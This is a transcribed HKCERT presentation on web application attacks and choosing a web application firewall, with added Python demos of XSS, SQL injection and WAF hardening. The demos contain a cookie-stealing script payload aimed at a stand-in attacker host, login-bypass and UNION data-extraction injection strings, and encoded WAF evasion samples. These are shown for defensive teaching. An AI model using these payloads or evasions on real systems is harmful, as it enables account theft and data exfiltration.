Contemporary Web Application Attacks - HKCERT

Transcription

Slide 1: Contemporary Web Application Attacks
Ivan Pang, Senior Consultant, Edvance Limited

Slide 2: Agenda
- How do web application attacks impact your business?
- What are the common attacks?
- What is a Web Application Firewall (WAF)?
- How can we select the right WAF?
Edvance Confidential

Slide 3: How web application attacks impact your business
What are the attackers going to do?
- Discover valuable information: credit card information, personal information, corporate financial information
- Interrupt on-line services: denial of service
- Damage the corporate image
- Look for web servers to launch further attacks from

Slide 4: How do attackers launch attacks?
The threat is evolving:
- Well funded
- Well organized
- Sophisticated
Automated attacks are the new frontier:
- Large scale
- Shifting locations
- Shifting techniques
Source: IBM Internet Security Systems, X-Force 2009 Mid-Year Trend and Risk Report

Slide 5: What are the common attacks?
Top 10 common attacks on web applications (according to the OWASP Top 10 2010 rc1)
http://www.owasp.org/index.php/Top_10

Slide 6: How bad can the damage be? Typical web attack demo

Slides 7–8: Attack step one – Understand the web server & database

Slides 9–10: Try to capture other users' cookie information – Cross-site scripting
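Added example (Python; not from the presentation): the cookie-capture cross-site scripting shown on slides 9–10 works because a page reflects user input into HTML without encoding it, so an injected script runs in the victim's browser and can read document.cookie. The page markup, the payload and the hostname attacker.example are constructed for this demo. It shows the vulnerable rendering next to the encoded one, and the HttpOnly cookie flag, which keeps script from reading the session cookie even where an XSS bug remains.

```python
import html

# Constructed payload: the kind of script an attacker injects to ship another
# user's cookies to a host they control. attacker.example is hypothetical.
COOKIE_THEFT_PAYLOAD = (
    "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"
)


def render_search_vulnerable(query: str) -> str:
    """Reflects the search term into the page without encoding (vulnerable)."""
    return f"<h1>Results for: {query}</h1>"


def render_search_safe(query: str) -> str:
    """Same page, but HTML-encodes the user input before reflecting it."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def set_cookie_header(session_id: str, http_only: bool = True) -> str:
    """Builds a Set-Cookie header; HttpOnly stops document.cookie from exposing it."""
    flags = ["Path=/", "Secure"]
    if http_only:
        flags.append("HttpOnly")
    return "Set-Cookie: SESSIONID=" + session_id + "; " + "; ".join(flags)


def demo() -> dict:
    """Runs both renderers on the payload and builds a hardened cookie header."""
    return {
        "vulnerable": render_search_vulnerable(COOKIE_THEFT_PAYLOAD),
        "safe": render_search_safe(COOKIE_THEFT_PAYLOAD),
        "cookie": set_cookie_header("abc123"),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label}: {value}")
```

In the vulnerable output the `<script>` tag is emitted verbatim and executes; in the safe output it becomes `&lt;script&gt;` and is only displayed. HttpOnly does not fix the XSS, but it removes the cookie from what the injected script can read.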

Slides 11–12: Bypass login authentication – SQL injection

Slides 13–18: Extract whatever data you want – SQL injection
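Added example (Python with the standard-library sqlite3 module; not from the presentation): one runnable walk-through of the three SQL injection steps on slides 7–8 and 11–18, namely fingerprinting the database, bypassing the login, and pulling card data out through a UNION query, each shown against a string-concatenated query and then against the parameterised query that closes the hole. The users and products tables and their rows are constructed sample data; the demo in the talk was run against a different server, so the exact payloads there may differ.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory shop database for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            password TEXT, card TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!', '4111-1111-1111-1111');
        INSERT INTO users VALUES (2, 'alice', 'alice123', '5500-0000-0000-0004');
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'Widget');
    """)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the query by string concatenation: user input becomes SQL syntax."""
    sql = ("SELECT id, username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterised query: input is bound as data and never parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def product_search_vulnerable(conn, term: str):
    """Search box that concatenates the term into a LIKE clause (vulnerable)."""
    sql = "SELECT id, name FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def product_search_safe(conn, term: str):
    """Same search with the wildcard built in Python and the term bound."""
    sql = "SELECT id, name FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def real_version(conn) -> str:
    """What the database reports when asked directly (used to check the attack)."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


def fingerprint_vulnerable(conn) -> str:
    """Attack step one: learn the engine version through the injection point.
    The UNION appends a row whose second column is the marker 'v'."""
    rows = product_search_vulnerable(conn, "' UNION SELECT sqlite_version(), 'v'--")
    return [first for first, second in rows if second == "v"][0]


if __name__ == "__main__":
    db = build_db()
    print("fingerprint:", fingerprint_vulnerable(db))
    print("bypass     :", login_vulnerable(db, "admin'--", "wrong"))
    print("extract    :", product_search_vulnerable(
        db, "' UNION SELECT username, card FROM users--"))
    print("safe login :", login_safe(db, "admin'--", "wrong"))
```

The comment sequence `--` discards the rest of the original statement, which is why `admin'--` as the username logs in without a password; the same trick on the search box turns a product listing into a dump of usernames and card numbers. The "shutdown database server" step on slides 19–20 is not reproduced: it needs stacked statements (a second, administrative statement after a `;`), which this driver refuses to execute in a single call and which many, but not all, database drivers allow.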

Slides 19–20: Shut down the database server

Slide 21: Why a Web Application Firewall?
Web application firewalls alone detect attacks against applications!
- Traditional firewalls only detect network attacks: they only inspect the IP address and port/service number
- IDS products only detect known signatures: no application understanding, a high rate of false positives/negatives, no user/session tracking, no protection of SSL traffic
Diagram (OSI layers): Network (OSI Layers 1–3) – network access; Protocols (OSI Layers 4–6) – protocol; Application (OSI Layer 7) – data

Slide 22: How to choose the right Web Application Firewall – WAF selection criteria

Slide 23: How to choose the right WAF?
- Throughput and latency
- Depth of protection
- Ease of use
- False positives and negatives
- Reporting
- Price

Slide 24: Common WAF requirements of customers
Security:
- Mitigation of SQL injection, cross-site scripting, cross-site request forgery, etc.; signatures alone are not enough
- False positive correction with minimal security impact
- Detailed alert/violation forensics
- Anonymous proxy and botnet awareness
- Automated vulnerability scanner integration
- Tracking of the web username
- Automatic security updates
Management/Reporting:
- Central management of policies, alerts, reports, etc.
- Flexible security policy assignment and creation
- Effective reporting system
- Custom reporting capabilities
- Flexibility in deployment mode
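Added example (Python; not from the presentation or any WAF vendor): why the slide says "signatures are not enough". A plain substring signature on the raw request misses the same attack once it is written in a different case, split with a SQL comment, or URL-encoded once or twice, while a WAF that decodes and canonicalises the request before matching catches all of those forms. The signatures, request values and normalisation steps are simplified for the demo and assumed here; a product's rule set is far larger. The last check shows the other side of the trade-off: after normalisation a harmless forum post that merely mentions `UNION SELECT` is flagged, which is the false-positive problem the slide asks vendors to handle.

```python
import re
from urllib.parse import unquote_plus

# Constructed, deliberately naive rule set: literal, case-sensitive substrings.
NAIVE_SIGNATURES = ["UNION SELECT", "' OR 1=1", "<script>"]


def naive_match(raw_value: str) -> list:
    """Matches the signatures against the request value exactly as received."""
    return [s for s in NAIVE_SIGNATURES if s in raw_value]


def normalize(raw_value: str, max_decode_rounds: int = 3) -> str:
    """Canonicalise the value the way a WAF must before it compares signatures."""
    value = raw_value
    # Decode repeatedly: attackers double-encode to get past a single decode.
    for _ in range(max_decode_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = value.lower()                     # case is irrelevant to SQL/HTML
    value = re.sub(r"/\*.*?\*/", " ", value)  # drop SQL inline comments
    value = re.sub(r"\s+", " ", value)        # collapse whitespace runs
    return value


NORMALIZED_SIGNATURES = [s.lower() for s in NAIVE_SIGNATURES]


def normalized_match(raw_value: str) -> list:
    """Matches after normalisation; returns the (lower-cased) rules that fired."""
    canonical = normalize(raw_value)
    return [s for s in NORMALIZED_SIGNATURES if s in canonical]


# Constructed request values: three evasions of the same attack, one benign hit.
SAMPLES = {
    "plain":          "1' UNION SELECT user, pass FROM users--",
    "comment_split":  "1' union/**/select user, pass from users--",
    "url_encoded":    "1%27%20UNION%20SELECT%20user,pass%20FROM%20users--",
    "double_encoded": "1%2527%2520%2555NION%2520SELECT%2520user,pass",
    "benign_post":    "How do I write a UNION SELECT query in SQL?",
}


def compare() -> dict:
    """Returns {sample: (naive_hits, normalized_hits)} for every constructed value."""
    return {k: (naive_match(v), normalized_match(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:15} naive={naive} normalized={norm}")
```

Only the plain form trips the naive rule; the three evasions pass it and are caught only after decoding, case folding and comment stripping. The benign post is caught by both, which is why a usable WAF needs per-rule exceptions or a scoring model rather than a hard block on every signature hit.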

Slide 25: Deployment mode – a critical factor for performance
Transparent inline bridge:
- Supports full enforcement
- High performance, low latency
- Fail-open interfaces
Transparent & reverse proxy:
- High performance for content modification
- URL rewriting, cookie signing, SSL termination
Third mode (label partly lost in transcription: "...ne Deployment"):
- Primarily for monitoring, zero network latency
- Software mode installation
Diagram labels: Internet, Reverse Proxy, Switch, Data Center
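Added example (Python; not from the presentation or any product): what the "cookie signing" feature listed under the reverse-proxy mode does. A reverse proxy sees every response, so it can append an HMAC to cookies on the way out and verify it on the way back in; a client that edits a cookie value (here, a role cookie changed from user to admin) fails verification and the request is dropped before it reaches the application. The secret, the cookie names and the header layout are assumed for this demo; a real deployment keeps the key only on the WAF and rotates it.

```python
import base64
import hashlib
import hmac

# Hypothetical proxy-side key; in practice it lives only on the WAF.
PROXY_SECRET = b"demo-only-change-me"

# Cookies the proxy signs; others pass through untouched.
SIGNED_COOKIES = {"role", "SESSIONID"}


def _tag(name: str, value: str, secret: bytes) -> str:
    """HMAC over name=value, so a tag cannot be moved to a different cookie."""
    mac = hmac.new(secret, f"{name}={value}".encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode().rstrip("=")


def sign_cookie(name: str, value: str, secret: bytes = PROXY_SECRET) -> str:
    """Outbound: append the tag so the value becomes value.tag."""
    return f"{value}.{_tag(name, value, secret)}"


def verify_cookie(name: str, signed: str, secret: bytes = PROXY_SECRET):
    """Inbound: return the original value if the tag checks out, else None."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None                      # no tag at all: treat as tampered
    if not hmac.compare_digest(_tag(name, value, secret), tag):
        return None
    return value


def proxy_outbound(set_cookie_value: str, secret: bytes = PROXY_SECRET) -> str:
    """Rewrite 'name=value[; attrs]' from the application before it leaves."""
    pair, _, attrs = set_cookie_value.partition(";")
    name, _, value = pair.strip().partition("=")
    if name in SIGNED_COOKIES:
        value = sign_cookie(name, value, secret)
    rebuilt = f"{name}={value}"
    return rebuilt + (";" + attrs if attrs else "")


def proxy_inbound(cookie_header: str, secret: bytes = PROXY_SECRET):
    """Check a request's Cookie header; None means block the request."""
    cleaned = {}
    for part in cookie_header.split(";"):
        if "=" not in part:
            continue
        name, _, value = part.strip().partition("=")
        if name in SIGNED_COOKIES:
            value = verify_cookie(name, value, secret)
            if value is None:
                return None
        cleaned[name] = value
    return cleaned


if __name__ == "__main__":
    out = proxy_outbound("role=user; Path=/; HttpOnly")
    print("to client :", out)
    signed = out.split(";")[0].split("=", 1)[1]
    print("genuine   :", proxy_inbound(f"role={signed}; theme=dark"))
    tag = signed.rpartition(".")[2]
    print("tampered  :", proxy_inbound(f"role=admin.{tag}; theme=dark"))
```

The application never learns the tag exists: it is stripped on the way in and added on the way out, which is why this only works in a mode where the WAF sits in the response path and can modify content.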

Slide 26: Preemptive protection
Diagram: attack sources (Hacker A, Hacker B, Hacker C, anonymous proxy, malicious/TOR IP, phishing site) and incidents (application vulnerability recon, zero-day attack, phishing incident) feed a Security Research Team, which distributes attack source feeds to the WAF

Slide 27: Q & A session
